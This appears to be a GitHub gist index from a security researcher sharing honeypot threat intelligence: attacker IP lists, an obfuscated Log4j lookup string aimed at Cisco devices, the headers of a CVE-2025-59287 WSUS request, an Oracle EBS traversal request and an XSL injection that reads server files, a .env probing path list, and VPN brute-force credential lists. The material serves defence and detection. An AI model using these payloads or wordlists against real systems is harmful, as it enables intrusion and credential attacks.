simokohonen’s gists

simokohonen / gist:5cbc08664c035950a8df539c21916a9a

Created June 17, 2026 12:15

Potential "Fortibleed" IPs

	IP Address,ASN,AS Name,AS Domain,Country Code,Country,Continent Code,Continent
	172.121.42.99,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.121.67.204,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	135.106.107.61,AS204957,GREEN FLOID LLC,greenfloid.com,US,United States,NA,North America
	172.120.176.21,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.120.130.45,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.120.161.4,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.120.121.58,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.120.157.183,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America
	172.120.194.211,AS44559,IT HOSTLINE LTD,ithostline.com,US,United States,NA,North America

simokohonen / gist:c7b21f3d47e2e45613fec36f535547a1

Created December 12, 2025 07:08

cisco_log4j_looking_things

GET /${${1:-j}${fg:7:-n}${0:an:3d7:-d}${8l:-i}${36jv:co9p:-:}${a4:5p2:-l}${7c2r:hrw:-d}${5l6x:-a}${i:-p}${ml:7:fodr:-:}${93:-/}${sbt3:xl:-/}${vsfp:-P}${c:dr76:-A}${x8:mnft:8nt6:-l}${pntj:nt9:-0}${k6:-c}${rv:pbuh:--}${${qdcr:5e:f:-s}${rj9:-y}${vag6:np1:m1:-s}${bop:-:}${ku5x:-j}${y3:-a}${j:-v}${h7j8:-a}${3hg:5a:y4s:-.}${f:fij:6:-v}${ql:-e}${i0ew:kfju:vyfb:-r}${0q:1:hdql:-s}${zg:o8a:-i}${jrp:ht0:-o}${jo9:-n}}${d:-.}${r:7:-8}${34tz:zbp:-b}${v7g:-3}${g6x:-6}${umdk:-1}${6zgi:-6}${gek:-d}${4p0:eq7z:yv1:-3}${4v:m9l:s3:-5}${e:-e}${3g0u:8:cbo:-1}${sxv:03hs:mh:-9}${7klx:2u:-f}${x:pb:-d}${1e:i2gk:y:-8}${9cpw:n0ap:-2}${qm:3i:-d}${9i:nu1:-f}${kwh:07p:89j:-0}${h8z:a:-f}${o:v0jg:o3v:-4}${be8z:q3v:bt:-0}${4:q14:-6}${n:o:-0}${c:ucfk:o06p:-1}${6:-2}${n4:-2}${w0u:-f}${oc4h:n:g42:-5}${nciz:2kb:rz1l:-7}${0wl:ux8:-c}${z1:-8}${16s:on:8s:-3}${d:hzb:-3}${a:-8}${ki:qk1:-f}${pnk:d:-d}${ovai:-9}${d:-0}${orxs:j:-e}${cw:a:-2}${q:ml:-a}${im:towb:6c:-.}${h:794c:-d}${92op:7rz:-n}${189j:-s}${85t:p4k:--}${6:ph:-e}${s5:-x}${r9iy:-f}${w:i:iufr:-i

simokohonen / gist:4b8a7bbd93330b46ec5311e5387124d1

Created November 28, 2025 19:06

cisco anyconnect scanning / enum 28th nov 2025

	92.118.112.160
	92.118.112.115
	92.118.112.102
	92.118.112.92
	92.118.112.46
	78.153.155.242
	92.118.112.81
	92.118.112.163
	193.34.213.150
	178.128.95.222

simokohonen / gist:eb854a1628509138bc4cd8992833a4d3

Created November 7, 2025 12:04

CVE-2025-59287 payload


	POST /ReportingWebService/ReportingWebService.asmx HTTP/1.1
	Host: [redacted]:8530
	User-Agent: Windows-Update-Agent
	Content-Length: 5244
	Accept: text/xml
	Connection: Keep-Alive
	Content-Type: text/xml
	SOAPAction: "http://www.microsoft.com/SoftwareDistribution/ReportEventBatch"
	Accept-Encoding: gzip

simokohonen / userpass.txt

Created October 28, 2025 21:07

Cisco Honeypot Bruteforce Username-Password Combinations 21-28 Oct 2025

This file has been truncated, but you can view the full file.

	Username: anyconnect, Password: WELLCOME*1234!
	Username: rhett, Password: password1
	Username: cisco, Password: CISCO!2025
	Username: net, Password: password1234
	Username: dell, Password: Dell
	Username: defaults, Password: defaults
	Username: anyconnect, Password: ANYCONNECT%2512345
	Username: anyconnect, Password: qwerty_17
	Username: guest, Password: guestguest
	Username: cruz, Password: CRUZ123

simokohonen / gist:dce6e29384a06842a77fca405d364566

Created October 28, 2025 21:06

Cisco Honeypot Bruteforce IPs 21-28 Oct 2025

	178.130.47.30
	178.130.47.163
	178.130.47.45
	178.130.47.34
	178.130.47.154
	178.130.47.48
	178.130.47.50
	178.130.47.46
	178.130.47.161
	178.130.47.158

simokohonen / gist:af1bb422fddc80237ddb051233ce1ca3

Last active October 20, 2025 13:10

	<?xml version="1.0" encoding="UTF-8"?>
	<initialize>
	<param name="init_was_saved">test</param>

	<param name="return_url">
	http://apps.example.com:7201/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
	Host: 103.140.45.8:4422
	User-Agent: xxxxx
	Connection: keep-alive
	Cookie:

simokohonen / gist:d9b24e5066180c79ce4be1761bb9fa9e

Created October 9, 2025 12:34

.env urls enumeration

	/.env
	/.env.production
	/.env.www
	/.env-release.env
	/example/.env
	/.env
	/client/.env.production
	/node/.env_example
	/.env.test
	/.env.local

simokohonen / gist:3b978601568d9e56b3cf203958a863d4

Created October 8, 2025 05:56

	xsl=<xsl:stylesheet version="1.0"
	xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
	xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String"
	xmlns:file="http://www.oracle.com/XSL/Transform/java/java.io.File"
	xmlns:reader="http://www.oracle.com/XSL/Transform/java/java.io.FileReader"
	xmlns:buf="http://www.oracle.com/XSL/Transform/java/java.io.BufferedReader">
	<xsl:template match="/">
	<xsl:variable name="versionFile" select="file:new('/u01/app/oracle/apps/12.2.0/version.txt')"/>
	<xsl:variable name="versionFile2" select="file:new('/u01/app/oracle/apps/12.1.0/version.txt')"/>
	<xsl:variable name="versionFile3" select="file:new('/u01/app/oracle/apps/12.0.0/version.txt')"/>

simokohonen / credentials.txt

Last active October 29, 2025 01:21

Cisco ASA login bruteforcing user + password list

	cisco:ANYCONNECT.2017
	anyconnect:Anyconnect*3!
	cisco:anyconnect%4012345
	cisco:CISCO.123456!
	cisco:Anyconnect%402025
	cisco:Anyconnect_17
	cisco:CISCO%252
	cisco:ANYCONNECT%2421
	anyconnect:Anyconnect%26123456!
	cisco:ANYCONNECT!2017!

Simo Kohonen simokohonen